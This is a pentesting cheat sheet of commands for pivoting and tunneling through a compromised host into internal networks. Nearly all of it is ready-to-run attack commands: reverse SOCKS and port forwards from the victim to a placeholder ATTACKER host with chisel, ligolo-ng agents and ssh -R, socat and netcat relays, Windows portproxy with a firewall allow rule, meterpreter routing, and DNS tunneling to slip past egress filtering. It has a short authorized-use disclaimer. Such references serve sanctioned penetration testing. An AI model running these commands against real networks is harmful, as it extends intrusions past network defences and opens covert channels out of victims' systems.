← All cheat sheets

PIVOTING-TUNNELING

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Reach networks you can't touch directly by routing through a compromised host.
Authorized engagements only.

SSH TUNNELS#

Local  (reach remote svc via your port):   ssh -L 9000:10.0.0.5:3389 user@pivot
Remote (expose your svc on the pivot):      ssh -R 9000:127.0.0.1:80 user@pivot
Dynamic SOCKS proxy:                        ssh -D 1080 user@pivot
  then: proxychains nmap -sT -Pn 10.0.0.0/24   (set socks4/5 127.0.0.1 1080)
Via jump host:   ssh -J user@pivot user@internal
Reverse SOCKS from a box you shelled:  ssh -R 1080 user@you   (OpenSSH 8.3+)

CHISEL (HTTP tunnel, cross-platform)#

Attacker:  chisel server -p 8080 --reverse
Victim:    chisel client ATTACKER:8080 R:socks           # reverse SOCKS5
           chisel client ATTACKER:8080 R:3389:10.0.0.5:3389   # reverse port fwd
Forward:   chisel client ATTACKER:8080 1080:socks

LIGOLO-NG (tun interface -- cleanest)#

Attacker (proxy):
  ip tuntap add user $USER mode tun ligolo ; ip link set ligolo up
  ligolo-proxy -selfcert
Agent on pivot:  agent -connect ATTACKER:11601 -ignore-cert
In proxy console: session -> start ; then on attacker:
  ip route add 10.0.0.0/24 dev ligolo     # now reach the subnet natively
Listener (reverse to internal): listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

SOCAT / NETCAT RELAYS#

socat TCP-LISTEN:9000,fork TCP:10.0.0.5:3389
Relay in two hops: socat TCP-LISTEN:8080,fork TCP:nexthop:8080
netcat relay: mknod bp p; nc -l 8080 0<bp | nc tgt 80 1>bp

WINDOWS NATIVE#

netsh interface portproxy add v4tov4 listenport=9000 connectaddress=10.0.0.5 connectport=3389
netsh advfirewall firewall add rule name=p dir=in action=allow protocol=TCP localport=9000
plink.exe -ssh -D 1080 user@you          # SSH SOCKS from Windows
Remove: netsh interface portproxy reset

METASPLOIT / OTHERS#

meterpreter: run autoroute -s 10.0.0.0/24 ; then route print
  portfwd add -l 9000 -p 3389 -r 10.0.0.5 ; socks proxy aux module
sshuttle (VPN-over-ssh): sshuttle -r user@pivot 10.0.0.0/24
dnscat2 / iodine for DNS tunneling when only DNS egresses.

PROXYCHAINS CONFIG#

/etc/proxychains4.conf:  [ProxyList]  socks5 127.0.0.1 1080
Use -q (quiet); set proxy_dns; TCP-connect scans only through SOCKS (no -sS).